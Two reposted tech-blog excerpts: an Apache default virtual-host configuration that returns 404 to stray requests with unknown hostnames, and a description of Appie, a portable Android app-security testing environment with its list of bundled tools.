"If no ServerName is specified, then the server attempts to deduce the hostname by performing a reverse lookup on the IP address."
Remember that millions of requests had a host name that would need to be looked up. After consulting the documentation, I set up a virtual host that would quickly return a 404 error for the request and display a special message at the root directory. Here's what it looks like:
# Put this block before the named virtual hosts so that requests whose Host
# header matches no ServerName land here instead of in the first real site.
<VirtualHost _default_:80>
    ServerName default
    DocumentRoot "/Web/Sites/default"
    <Directory "/Web/Sites/default">
        Options None
        AllowOverride None
        DAV Off
    </Directory>
    LogLevel warn
</VirtualHost>
Source:: http://furbo.org/2015/1/22/fear-china/

Tools: Appie – Android Pentesting Portable Integrated Environment

Why was Appie created?
Just because I wanted something awesome instead of traditional virtual machines.
Difference between Appie and existing environments?
    •    Tools contained in Appie run on the host machine instead of in a virtual machine.
    •    Less space needed (only 600 MB compared to at least 8 GB for a virtual machine).
    •    As the name suggests, it is completely portable, i.e. it can be carried on a USB stick or on your own smartphone, and your pentesting environment goes wherever you go without any differences.
    •    Awesome interface

What does Appie mean?
In the search for an awesome name, I found Appie, which stands for Android Pentesting Portable Integrated Environment, and most importantly the name defines itself.
Getting started
    •    Download the file.
    •    Unzip the file.
    •    Click on the executable Appie in the extracted folder.
    •    Go through the Usage.
I have also started an Android Application Security Series for those who need to learn about Android application security. In that series I have used Appie extensively.

Which tools are included in Appie?
    •    Drozer
    •    dex2jar
    •    Androguard
    •    Introspy-Analyzer
    •    JD-GUI
    •    Android Debug Bridge
    •    Apktool
    •    Sublime Text
    •    Androguard SublimeText Plugin
    •    Eclipse with Android Developer Tools
    •    OWASP GoatDroid Project, configured
    •    Fastboot and sqlite3
    •    Nearly all UNIX commands like ls, cat, chmod, cp, find, git, unzip, mkdir, ssh, openssl, keytool, jarsigner and many others


Source:: http://manifestsecurity.com/appie/
